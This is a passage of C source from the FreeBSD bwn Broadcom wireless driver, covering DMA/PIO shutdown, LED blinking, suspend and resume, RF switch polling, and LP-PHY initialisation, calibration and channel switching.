dr->dr_numslots) { /* * XXX FIXME: sometimes H/W returns TX DONE events duplicately * that it occurs events which have same H/W sequence numbers. * When it's occurred just prints a WARNING msgs and ignores. */ KASSERT(status->seq == dma->lastseq, ("%s:%d: fail", __func__, __LINE__)); device_printf(sc->sc_dev, "out of slot ranges (0 < %d < %d)\n", *slot, dr->dr_numslots); return (NULL); } dma->lastseq = status->seq; return (dr); } static void bwn_dma_stop(struct bwn_mac *mac) { struct bwn_dma *dma; if ((mac->mac_flags & BWN_MAC_FLAG_DMA) == 0) return; dma = &mac->mac_method.dma; bwn_dma_ringstop(&dma->rx); bwn_dma_ringstop(&dma->wme[WME_AC_BK]); bwn_dma_ringstop(&dma->wme[WME_AC_BE]); bwn_dma_ringstop(&dma->wme[WME_AC_VI]); bwn_dma_ringstop(&dma->wme[WME_AC_VO]); bwn_dma_ringstop(&dma->mcast); } static void bwn_dma_ringstop(struct bwn_dma_ring **dr) { if (dr == NULL) return; bwn_dma_cleanup(*dr); } static void bwn_pio_stop(struct bwn_mac *mac) { struct bwn_pio *pio; if (mac->mac_flags & BWN_MAC_FLAG_DMA) return; pio = &mac->mac_method.pio; bwn_destroy_queue_tx(&pio->mcast); bwn_destroy_queue_tx(&pio->wme[WME_AC_VO]); bwn_destroy_queue_tx(&pio->wme[WME_AC_VI]); bwn_destroy_queue_tx(&pio->wme[WME_AC_BE]); bwn_destroy_queue_tx(&pio->wme[WME_AC_BK]); } static void bwn_led_attach(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; const uint8_t *led_act = NULL; uint16_t val[BWN_LED_MAX]; int i; sc->sc_led_idle = (2350 * hz) / 1000; sc->sc_led_blink = 1; for (i = 0; i < N(bwn_vendor_led_act); ++i) { if (siba_get_pci_subvendor(sc->sc_dev) == bwn_vendor_led_act[i].vid) { led_act = bwn_vendor_led_act[i].led_act; break; } } if (led_act == NULL) led_act = bwn_default_led_act; val[0] = siba_sprom_get_gpio0(sc->sc_dev); val[1] = siba_sprom_get_gpio1(sc->sc_dev); val[2] = siba_sprom_get_gpio2(sc->sc_dev); val[3] = siba_sprom_get_gpio3(sc->sc_dev); for (i = 0; i < BWN_LED_MAX; ++i) { struct bwn_led *led = &sc->sc_leds[i]; if (val[i] == 0xff) { led->led_act = led_act[i]; } else { if (val[i] & BWN_LED_ACT_LOW) led->led_flags |= BWN_LED_F_ACTLOW; led->led_act = val[i] & BWN_LED_ACT_MASK; } led->led_mask = (1 << i); if (led->led_act == BWN_LED_ACT_BLINK_SLOW || led->led_act == BWN_LED_ACT_BLINK_POLL || led->led_act == BWN_LED_ACT_BLINK) { led->led_flags |= BWN_LED_F_BLINK; if (led->led_act == BWN_LED_ACT_BLINK_POLL) led->led_flags |= BWN_LED_F_POLLABLE; else if (led->led_act == BWN_LED_ACT_BLINK_SLOW) led->led_flags |= BWN_LED_F_SLOW; if (sc->sc_blink_led == NULL) { sc->sc_blink_led = led; if (led->led_flags & BWN_LED_F_SLOW) BWN_LED_SLOWDOWN(sc->sc_led_idle); } } DPRINTF(sc, BWN_DEBUG_LED, "%dth led, act %d, lowact %d\n", i, led->led_act, led->led_flags & BWN_LED_F_ACTLOW); } callout_init_mtx(&sc->sc_led_blink_ch, &sc->sc_mtx, 0); } static __inline uint16_t bwn_led_onoff(const struct bwn_led *led, uint16_t val, int on) { if (led->led_flags & BWN_LED_F_ACTLOW) on = !on; if (on) val |= led->led_mask; else val &= ~led->led_mask; return val; } static void bwn_led_newstate(struct bwn_mac *mac, enum ieee80211_state nstate) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t val; int i; if (nstate == IEEE80211_S_INIT) { callout_stop(&sc->sc_led_blink_ch); sc->sc_led_blinking = 0; } if ((ic->ic_ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; val = BWN_READ_2(mac, BWN_GPIO_CONTROL); for (i = 0; i < BWN_LED_MAX; ++i) { struct bwn_led *led = &sc->sc_leds[i]; int on; if (led->led_act == BWN_LED_ACT_UNKN || led->led_act == BWN_LED_ACT_NULL) continue; if ((led->led_flags & BWN_LED_F_BLINK) && nstate != IEEE80211_S_INIT) continue; switch (led->led_act) { case BWN_LED_ACT_ON: /* Always on */ on = 1; break; case BWN_LED_ACT_OFF: /* Always off */ case BWN_LED_ACT_5GHZ: /* TODO: 11A */ on = 0; break; default: on = 1; switch (nstate) { case IEEE80211_S_INIT: on = 0; break; case IEEE80211_S_RUN: if (led->led_act == BWN_LED_ACT_11G && ic->ic_curmode != IEEE80211_MODE_11G) on = 0; break; default: if (led->led_act == BWN_LED_ACT_ASSOC) on = 0; break; } break; } val = bwn_led_onoff(led, val, on); } BWN_WRITE_2(mac, BWN_GPIO_CONTROL, val); } static void bwn_led_event(struct bwn_mac *mac, int event) { struct bwn_softc *sc = mac->mac_sc; struct bwn_led *led = sc->sc_blink_led; int rate; if (event == BWN_LED_EVENT_POLL) { if ((led->led_flags & BWN_LED_F_POLLABLE) == 0) return; if (ticks - sc->sc_led_ticks < sc->sc_led_idle) return; } sc->sc_led_ticks = ticks; if (sc->sc_led_blinking) return; switch (event) { case BWN_LED_EVENT_RX: rate = sc->sc_rx_rate; break; case BWN_LED_EVENT_TX: rate = sc->sc_tx_rate; break; case BWN_LED_EVENT_POLL: rate = 0; break; default: panic("unknown LED event %d\n", event); break; } bwn_led_blink_start(mac, bwn_led_duration[rate].on_dur, bwn_led_duration[rate].off_dur); } static void bwn_led_blink_start(struct bwn_mac *mac, int on_dur, int off_dur) { struct bwn_softc *sc = mac->mac_sc; struct bwn_led *led = sc->sc_blink_led; uint16_t val; val = BWN_READ_2(mac, BWN_GPIO_CONTROL); val = bwn_led_onoff(led, val, 1); BWN_WRITE_2(mac, BWN_GPIO_CONTROL, val); if (led->led_flags & BWN_LED_F_SLOW) { BWN_LED_SLOWDOWN(on_dur); BWN_LED_SLOWDOWN(off_dur); } sc->sc_led_blinking = 1; sc->sc_led_blink_offdur = off_dur; callout_reset(&sc->sc_led_blink_ch, on_dur, bwn_led_blink_next, mac); } static void bwn_led_blink_next(void *arg) { struct bwn_mac *mac = arg; struct bwn_softc *sc = mac->mac_sc; uint16_t val; val = BWN_READ_2(mac, BWN_GPIO_CONTROL); val = bwn_led_onoff(sc->sc_blink_led, val, 0); BWN_WRITE_2(mac, BWN_GPIO_CONTROL, val); callout_reset(&sc->sc_led_blink_ch, sc->sc_led_blink_offdur, bwn_led_blink_end, mac); } static void bwn_led_blink_end(void *arg) { struct bwn_mac *mac = arg; struct bwn_softc *sc = mac->mac_sc; sc->sc_led_blinking = 0; } static int bwn_suspend(device_t dev) { struct bwn_softc *sc = device_get_softc(dev); bwn_stop(sc, 1); return (0); } static int bwn_resume(device_t dev) { struct bwn_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; if (ifp->if_flags & IFF_UP) bwn_init(sc); return (0); } static void bwn_rfswitch(void *arg) { struct bwn_softc *sc = arg; struct bwn_mac *mac = sc->sc_curmac; int cur = 0, prev = 0; KASSERT(mac->mac_status >= BWN_MAC_STATUS_STARTED, ("%s: invalid MAC status %d", __func__, mac->mac_status)); if (mac->mac_phy.rf_rev >= 3 || mac->mac_phy.type == BWN_PHYTYPE_LP) { if (!(BWN_READ_4(mac, BWN_RF_HWENABLED_HI) & BWN_RF_HWENABLED_HI_MASK)) cur = 1; } else { if (BWN_READ_2(mac, BWN_RF_HWENABLED_LO) & BWN_RF_HWENABLED_LO_MASK) cur = 1; } if (mac->mac_flags & BWN_MAC_FLAG_RADIO_ON) prev = 1; if (cur != prev) { if (cur) mac->mac_flags |= BWN_MAC_FLAG_RADIO_ON; else mac->mac_flags &= ~BWN_MAC_FLAG_RADIO_ON; device_printf(sc->sc_dev, "status of RF switch is changed to %s\n", cur ? "ON" : "OFF"); if (cur != mac->mac_phy.rf_on) { if (cur) bwn_rf_turnon(mac); else bwn_rf_turnoff(mac); } } callout_schedule(&sc->sc_rfswitch_ch, hz); } static void bwn_phy_lp_init_pre(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_lp *plp = &phy->phy_lp; plp->plp_antenna = BWN_ANT_DEFAULT; } static int bwn_phy_lp_init(struct bwn_mac *mac) { static const struct bwn_stxtable tables[] = { { 2, 6, 0x3d, 3, 0x01 }, { 1, 12, 0x4c, 1, 0x01 }, { 1, 8, 0x50, 0, 0x7f }, { 0, 8, 0x44, 0, 0xff }, { 1, 0, 0x4a, 0, 0xff }, { 0, 4, 0x4d, 0, 0xff }, { 1, 4, 0x4e, 0, 0xff }, { 0, 12, 0x4f, 0, 0x0f }, { 1, 0, 0x4f, 4, 0x0f }, { 3, 0, 0x49, 0, 0x0f }, { 4, 3, 0x46, 4, 0x07 }, { 3, 15, 0x46, 0, 0x01 }, { 4, 0, 0x46, 1, 0x07 }, { 3, 8, 0x48, 4, 0x07 }, { 3, 11, 0x48, 0, 0x0f }, { 3, 4, 0x49, 4, 0x0f }, { 2, 15, 0x45, 0, 0x01 }, { 5, 13, 0x52, 4, 0x07 }, { 6, 0, 0x52, 7, 0x01 }, { 5, 3, 0x41, 5, 0x07 }, { 5, 6, 0x41, 0, 0x0f }, { 5, 10, 0x42, 5, 0x07 }, { 4, 15, 0x42, 0, 0x01 }, { 5, 0, 0x42, 1, 0x07 }, { 4, 11, 0x43, 4, 0x0f }, { 4, 7, 0x43, 0, 0x0f }, { 4, 6, 0x45, 1, 0x01 }, { 2, 7, 0x40, 4, 0x0f }, { 2, 11, 0x40, 0, 0x0f } }; struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; const struct bwn_stxtable *st; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int i, error; uint16_t tmp; bwn_phy_lp_readsprom(mac); /* XXX bad place */ bwn_phy_lp_bbinit(mac); /* initialize RF */ BWN_PHY_SET(mac, BWN_PHY_4WIRECTL, 0x2); DELAY(1); BWN_PHY_MASK(mac, BWN_PHY_4WIRECTL, 0xfffd); DELAY(1); if (mac->mac_phy.rf_ver == 0x2062) bwn_phy_lp_b2062_init(mac); else { bwn_phy_lp_b2063_init(mac); /* synchronize stx table. */ for (i = 0; i < N(tables); i++) { st = &tables[i]; tmp = BWN_RF_READ(mac, st->st_rfaddr); tmp >>= st->st_rfshift; tmp <<= st->st_physhift; BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xf2 + st->st_phyoffset), ~(st->st_mask << st->st_physhift), tmp); } BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0xf0), 0x5f80); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0xf1), 0); } /* calibrate RC */ if (mac->mac_phy.rev >= 2) bwn_phy_lp_rxcal_r2(mac); else if (!plp->plp_rccap) { if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) bwn_phy_lp_rccal_r12(mac); } else bwn_phy_lp_set_rccap(mac); error = bwn_phy_lp_switch_channel(mac, 7); if (error) device_printf(sc->sc_dev, "failed to change channel 7 (%d)\n", error); bwn_phy_lp_txpctl_init(mac); bwn_phy_lp_calib(mac); return (0); } static uint16_t bwn_phy_lp_read(struct bwn_mac *mac, uint16_t reg) { BWN_WRITE_2(mac, BWN_PHYCTL, reg); return (BWN_READ_2(mac, BWN_PHYDATA)); } static void bwn_phy_lp_write(struct bwn_mac *mac, uint16_t reg, uint16_t value) { BWN_WRITE_2(mac, BWN_PHYCTL, reg); BWN_WRITE_2(mac, BWN_PHYDATA, value); } static void bwn_phy_lp_maskset(struct bwn_mac *mac, uint16_t reg, uint16_t mask, uint16_t set) { BWN_WRITE_2(mac, BWN_PHYCTL, reg); BWN_WRITE_2(mac, BWN_PHYDATA, (BWN_READ_2(mac, BWN_PHYDATA) & mask) | set); } static uint16_t bwn_phy_lp_rf_read(struct bwn_mac *mac, uint16_t reg) { KASSERT(reg != 1, ("unaccessible register %d", reg)); if (mac->mac_phy.rev < 2 && reg != 0x4001) reg |= 0x100; if (mac->mac_phy.rev >= 2) reg |= 0x200; BWN_WRITE_2(mac, BWN_RFCTL, reg); return BWN_READ_2(mac, BWN_RFDATALO); } static void bwn_phy_lp_rf_write(struct bwn_mac *mac, uint16_t reg, uint16_t value) { KASSERT(reg != 1, ("unaccessible register %d", reg)); BWN_WRITE_2(mac, BWN_RFCTL, reg); BWN_WRITE_2(mac, BWN_RFDATALO, value); } static void bwn_phy_lp_rf_onoff(struct bwn_mac *mac, int on) { if (on) { BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xe0ff); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, (mac->mac_phy.rev >= 2) ? 0xf7f7 : 0xffe7); return; } if (mac->mac_phy.rev >= 2) { BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0x83ff); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x1f00); BWN_PHY_MASK(mac, BWN_PHY_AFE_DDFS, 0x80ff); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xdfff); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x0808); return; } BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xe0ff); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x1f00); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xfcff); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x0018); } static int bwn_phy_lp_switch_channel(struct bwn_mac *mac, uint32_t chan) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_lp *plp = &phy->phy_lp; int error; if (phy->rf_ver == 0x2063) { error = bwn_phy_lp_b2063_switch_channel(mac, chan); if (error) return (error); } else { error = bwn_phy_lp_b2062_switch_channel(mac, chan); if (error) return (error); bwn_phy_lp_set_anafilter(mac, chan); bwn_phy_lp_set_gaintbl(mac, ieee80211_ieee2mhz(chan, 0)); } plp->plp_chan = chan; BWN_WRITE_2(mac, BWN_CHANNEL, chan); return (0); } static uint32_t bwn_phy_lp_get_default_chan(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; return (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan) ? 1 : 36); } static void bwn_phy_lp_set_antenna(struct bwn_mac *mac, int antenna) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_lp *plp = &phy->phy_lp; if (phy->rev >= 2 || antenna > BWN_ANTAUTO1) return; bwn_hf_write(mac, bwn_hf_read(mac) & ~BWN_HF_UCODE_ANTDIV_HELPER); BWN_PHY_SETMASK(mac, BWN_PHY_CRSGAIN_CTL, 0xfffd, antenna & 0x2); BWN_PHY_SETMASK(mac, BWN_PHY_CRSGAIN_CTL, 0xfffe, antenna & 0x1); bwn_hf_write(mac, bwn_hf_read(mac) | BWN_HF_UCODE_ANTDIV_HELPER); plp->plp_antenna = antenna; } static void bwn_phy_lp_task_60s(struct bwn_mac *mac) { bwn_phy_lp_calib(mac); } static void bwn_phy_lp_readsprom(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { plp->plp_txisoband_m = siba_sprom_get_tri2g(sc->sc_dev); plp->plp_bxarch = siba_sprom_get_bxa2g(sc->sc_dev); plp->plp_rxpwroffset = siba_sprom_get_rxpo2g(sc->sc_dev); plp->plp_rssivf = siba_sprom_get_rssismf2g(sc->sc_dev); plp->plp_rssivc = siba_sprom_get_rssismc2g(sc->sc_dev); plp->plp_rssigs = siba_sprom_get_rssisav2g(sc->sc_dev); return; } plp->plp_txisoband_l = siba_sprom_get_tri5gl(sc->sc_dev); plp->plp_txisoband_m = siba_sprom_get_tri5g(sc->sc_dev); plp->plp_txisoband_h = siba_sprom_get_tri5gh(sc->sc_dev); plp->plp_bxarch = siba_sprom_get_bxa5g(sc->sc_dev); plp->plp_rxpwroffset = siba_sprom_get_rxpo5g(sc->sc_dev); plp->plp_rssivf = siba_sprom_get_rssismf5g(sc->sc_dev); plp->plp_rssivc = siba_sprom_get_rssismc5g(sc->sc_dev); plp->plp_rssigs = siba_sprom_get_rssisav5g(sc->sc_dev); } static void bwn_phy_lp_bbinit(struct bwn_mac *mac) { bwn_phy_lp_tblinit(mac); if (mac->mac_phy.rev >= 2) bwn_phy_lp_bbinit_r2(mac); else bwn_phy_lp_bbinit_r01(mac); } static void bwn_phy_lp_txpctl_init(struct bwn_mac *mac) { struct bwn_txgain gain_2ghz = { 4, 12, 12, 0 }; struct bwn_txgain gain_5ghz = { 7, 15, 14, 0 }; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; bwn_phy_lp_set_txgain(mac, IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan) ? &gain_2ghz : &gain_5ghz); bwn_phy_lp_set_bbmult(mac, 150); } static void bwn_phy_lp_calib(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct bwn_rxcompco *rc = NULL; struct bwn_txgain ogain; int i, omode, oafeovr, orf, obbmult; uint8_t mode, fc = 0; if (plp->plp_chanfullcal != plp->plp_chan) { plp->plp_chanfullcal = plp->plp_chan; fc = 1; } bwn_mac_suspend(mac); /* BlueTooth Coexistance Override */ BWN_WRITE_2(mac, BWN_BTCOEX_CTL, 0x3); BWN_WRITE_2(mac, BWN_BTCOEX_TXCTL, 0xff); if (mac->mac_phy.rev >= 2) bwn_phy_lp_digflt_save(mac); bwn_phy_lp_get_txpctlmode(mac); mode = plp->plp_txpctlmode; bwn_phy_lp_set_txpctlmode(mac, BWN_PHYLP_TXPCTL_OFF); if (mac->mac_phy.rev == 0 && mode != BWN_PHYLP_TXPCTL_OFF) bwn_phy_lp_bugfix(mac); if (mac->mac_phy.rev >= 2 && fc == 1) { bwn_phy_lp_get_txpctlmode(mac); omode = plp->plp_txpctlmode; oafeovr = BWN_PHY_READ(mac, BWN_PHY_AFE_CTL_OVR) & 0x40; if (oafeovr) ogain = bwn_phy_lp_get_txgain(mac); orf = BWN_PHY_READ(mac, BWN_PHY_RF_PWR_OVERRIDE) & 0xff; obbmult = bwn_phy_lp_get_bbmult(mac); bwn_phy_lp_set_txpctlmode(mac, BWN_PHYLP_TXPCTL_OFF); if (oafeovr) bwn_phy_lp_set_txgain(mac, &ogain); bwn_phy_lp_set_bbmult(mac, obbmult); bwn_phy_lp_set_txpctlmode(mac, omode); BWN_PHY_SETMASK(mac, BWN_PHY_RF_PWR_OVERRIDE, 0xff00, orf); } bwn_phy_lp_set_txpctlmode(mac, mode); if (mac->mac_phy.rev >= 2) bwn_phy_lp_digflt_restore(mac); /* do RX IQ Calculation; assumes that noise is true. */ if (siba_get_chipid(sc->sc_dev) == 0x5354) { for (i = 0; i < N(bwn_rxcompco_5354); i++) { if (bwn_rxcompco_5354[i].rc_chan == plp->plp_chan) rc = &bwn_rxcompco_5354[i]; } } else if (mac->mac_phy.rev >= 2) rc = &bwn_rxcompco_r2; else { for (i = 0; i < N(bwn_rxcompco_r12); i++) { if (bwn_rxcompco_r12[i].rc_chan == plp->plp_chan) rc = &bwn_rxcompco_r12[i]; } } if (rc == NULL) goto fail; BWN_PHY_SETMASK(mac, BWN_PHY_RX_COMP_COEFF_S, 0xff00, rc->rc_c1); BWN_PHY_SETMASK(mac, BWN_PHY_RX_COMP_COEFF_S, 0x00ff, rc->rc_c0 << 8); bwn_phy_lp_set_trsw_over(mac, 1 /* TX */, 0 /* RX */); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x8); BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xfff7, 0); } else { BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x20); BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xffdf, 0); } bwn_phy_lp_set_rxgain(mac, 0x2d5d); BWN_PHY_MASK(mac, BWN_PHY_AFE_CTL_OVR, 0xfffe); BWN_PHY_MASK(mac, BWN_PHY_AFE_CTL_OVRVAL, 0xfffe); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x800); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0x800); bwn_phy_lp_set_deaf(mac, 0); /* XXX no checking return value? */ (void)bwn_phy_lp_calc_rx_iq_comp(mac, 0xfff0); bwn_phy_lp_clear_deaf(mac, 0); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xfffc); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xfff7); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xffdf); /* disable RX GAIN override. */ BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xfffe); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xffef); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xffbf); if (mac->mac_phy.rev >= 2) { BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, 0xfeff); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, 0xfbff); BWN_PHY_MASK(mac, BWN_PHY_OFDM(0xe5), 0xfff7); } } else { BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, 0xfdff); } BWN_PHY_MASK(mac, BWN_PHY_AFE_CTL_OVR, 0xfffe); BWN_PHY_MASK(mac, BWN_PHY_AFE_CTL_OVRVAL, 0xf7ff); fail: bwn_mac_enable(mac); } static void bwn_phy_lp_switch_analog(struct bwn_mac *mac, int on) { if (on) { BWN_PHY_MASK(mac, BWN_PHY_AFE_CTL_OVR, 0xfff8); return; } BWN_PHY_SET(mac, BWN_PHY_AFE_CTL_OVRVAL, 0x0007); BWN_PHY_SET(mac, BWN_PHY_AFE_CTL_OVR, 0x0007); } static int bwn_phy_lp_b2063_switch_channel(struct bwn_mac *mac, uint8_t chan) { static const struct bwn_b206x_chan *bc = NULL; struct bwn_softc *sc = mac->mac_sc; uint32_t count, freqref, freqvco, freqxtal, val[3], timeout, timeoutref, tmp[6]; uint16_t old, scale, tmp16; int i, div; for (i = 0; i < N(bwn_b2063_chantable); i++) { if (bwn_b2063_chantable[i].bc_chan == chan) { bc = &bwn_b2063_chantable[i]; break; } } if (bc == NULL) return (EINVAL); BWN_RF_WRITE(mac, BWN_B2063_LOGEN_VCOBUF1, bc->bc_data[0]); BWN_RF_WRITE(mac, BWN_B2063_LOGEN_MIXER2, bc->bc_data[1]); BWN_RF_WRITE(mac, BWN_B2063_LOGEN_BUF2, bc->bc_data[2]); BWN_RF_WRITE(mac, BWN_B2063_LOGEN_RCCR1, bc->bc_data[3]); BWN_RF_WRITE(mac, BWN_B2063_A_RX_1ST3, bc->bc_data[4]); BWN_RF_WRITE(mac, BWN_B2063_A_RX_2ND1, bc->bc_data[5]); BWN_RF_WRITE(mac, BWN_B2063_A_RX_2ND4, bc->bc_data[6]); BWN_RF_WRITE(mac, BWN_B2063_A_RX_2ND7, bc->bc_data[7]); BWN_RF_WRITE(mac, BWN_B2063_A_RX_PS6, bc->bc_data[8]); BWN_RF_WRITE(mac, BWN_B2063_TX_RF_CTL2, bc->bc_data[9]); BWN_RF_WRITE(mac, BWN_B2063_TX_RF_CTL5, bc->bc_data[10]); BWN_RF_WRITE(mac, BWN_B2063_PA_CTL11, bc->bc_data[11]); old = BWN_RF_READ(mac, BWN_B2063_COM15); BWN_RF_SET(mac, BWN_B2063_COM15, 0x1e); freqxtal = siba_get_cc_pmufreq(sc->sc_dev) * 1000; freqvco = bc->bc_freq << ((bc->bc_freq > 4000) ? 1 : 2); freqref = freqxtal * 3; div = (freqxtal <= 26000000 ? 1 : 2); timeout = ((((8 * freqxtal) / (div * 5000000)) + 1) >> 1) - 1; timeoutref = ((((8 * freqxtal) / (div * (timeout + 1))) + 999999) / 1000000) + 1; BWN_RF_WRITE(mac, BWN_B2063_JTAG_VCO_CALIB3, 0x2); BWN_RF_SETMASK(mac, BWN_B2063_JTAG_VCO_CALIB6, 0xfff8, timeout >> 2); BWN_RF_SETMASK(mac, BWN_B2063_JTAG_VCO_CALIB7, 0xff9f,timeout << 5); BWN_RF_WRITE(mac, BWN_B2063_JTAG_VCO_CALIB5, timeoutref); val[0] = bwn_phy_lp_roundup(freqxtal, 1000000, 16); val[1] = bwn_phy_lp_roundup(freqxtal, 1000000 * div, 16); val[2] = bwn_phy_lp_roundup(freqvco, 3, 16); count = (bwn_phy_lp_roundup(val[2], val[1] + 16, 16) * (timeout + 1) * (timeoutref + 1)) - 1; BWN_RF_SETMASK(mac, BWN_B2063_JTAG_VCO_CALIB7, 0xf0, count >> 8); BWN_RF_WRITE(mac, BWN_B2063_JTAG_VCO_CALIB8, count & 0xff); tmp[0] = ((val[2] * 62500) / freqref) << 4; tmp[1] = ((val[2] * 62500) % freqref) << 4; while (tmp[1] >= freqref) { tmp[0]++; tmp[1] -= freqref; } BWN_RF_SETMASK(mac, BWN_B2063_JTAG_SG1, 0xffe0, tmp[0] >> 4); BWN_RF_SETMASK(mac, BWN_B2063_JTAG_SG2, 0xfe0f, tmp[0] << 4); BWN_RF_SETMASK(mac, BWN_B2063_JTAG_SG2, 0xfff0, tmp[0] >> 16); BWN_RF_WRITE(mac, BWN_B2063_JTAG_SG3, (tmp[1] >> 8) & 0xff); BWN_RF_WRITE(mac, BWN_B2063_JTAG_SG4, tmp[1] & 0xff); BWN_RF_WRITE(mac, BWN_B2063_JTAG_LF1, 0xb9); BWN_RF_WRITE(mac, BWN_B2063_JTAG_LF2, 0x88); BWN_RF_WRITE(mac, BWN_B2063_JTAG_LF3, 0x28); BWN_RF_WRITE(mac, BWN_B2063_JTAG_LF4, 0x63); tmp[2] = ((41 * (val[2] - 3000)) /1200) + 27; tmp[3] = bwn_phy_lp_roundup(132000 * tmp[0], 8451, 16); if ((tmp[3] + tmp[2] - 1) / tmp[2] > 60) { scale = 1; tmp[4] = ((tmp[3] + tmp[2]) / (tmp[2] << 1)) - 8; } else { scale = 0; tmp[4] = ((tmp[3] + (tmp[2] >> 1)) / tmp[2]) - 8; } BWN_RF_SETMASK(mac, BWN_B2063_JTAG_CP2, 0xffc0, tmp[4]); BWN_RF_SETMASK(mac, BWN_B2063_JTAG_CP2, 0xffbf, scale << 6); tmp[5] = bwn_phy_lp_roundup(100 * val[0], val[2], 16) * (tmp[4] * 8) * (scale + 1); if (tmp[5] > 150) tmp[5] = 0; BWN_RF_SETMASK(mac, BWN_B2063_JTAG_CP3, 0xffe0, tmp[5]); BWN_RF_SETMASK(mac, BWN_B2063_JTAG_CP3, 0xffdf, scale << 5); BWN_RF_SETMASK(mac, BWN_B2063_JTAG_XTAL_12, 0xfffb, 0x4); if (freqxtal > 26000000) BWN_RF_SET(mac, BWN_B2063_JTAG_XTAL_12, 0x2); else BWN_RF_MASK(mac, BWN_B2063_JTAG_XTAL_12, 0xfd); if (val[0] == 45) BWN_RF_SET(mac, BWN_B2063_JTAG_VCO1, 0x2); else BWN_RF_MASK(mac, BWN_B2063_JTAG_VCO1, 0xfd); BWN_RF_SET(mac, BWN_B2063_PLL_SP2, 0x3); DELAY(1); BWN_RF_MASK(mac, BWN_B2063_PLL_SP2, 0xfffc); /* VCO Calibration */ BWN_RF_MASK(mac, BWN_B2063_PLL_SP1, ~0x40); tmp16 = BWN_RF_READ(mac, BWN_B2063_JTAG_CALNRST) & 0xf8; BWN_RF_WRITE(mac, BWN_B2063_JTAG_CALNRST, tmp16); DELAY(1); BWN_RF_WRITE(mac, BWN_B2063_JTAG_CALNRST, tmp16 | 0x4); DELAY(1); BWN_RF_WRITE(mac, BWN_B2063_JTAG_CALNRST, tmp16 | 0x6); DELAY(1); BWN_RF_WRITE(mac, BWN_B2063_JTAG_CALNRST, tmp16 | 0x7); DELAY(300); BWN_RF_SET(mac, BWN_B2063_PLL_SP1, 0x40); BWN_RF_WRITE(mac, BWN_B2063_COM15, old); return (0); } static int bwn_phy_lp_b2062_switch_channel(struct bwn_mac *mac, uint8_t chan) { struct bwn_softc *sc = mac->mac_sc; struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; const struct bwn_b206x_chan *bc = NULL; uint32_t freqxtal = siba_get_cc_pmufreq(sc->sc_dev) * 1000; uint32_t tmp[9]; int i; for (i = 0; i < N(bwn_b2062_chantable); i++) { if (bwn_b2062_chantable[i].bc_chan == chan) { bc = &bwn_b2062_chantable[i]; break; } } if (bc == NULL) return (EINVAL); BWN_RF_SET(mac, BWN_B2062_S_RFPLLCTL14, 0x04); BWN_RF_WRITE(mac, BWN_B2062_N_LGENATUNE0, bc->bc_data[0]); BWN_RF_WRITE(mac, BWN_B2062_N_LGENATUNE2, bc->bc_data[1]); BWN_RF_WRITE(mac, BWN_B2062_N_LGENATUNE3, bc->bc_data[2]); BWN_RF_WRITE(mac, BWN_B2062_N_TX_TUNE, bc->bc_data[3]); BWN_RF_WRITE(mac, 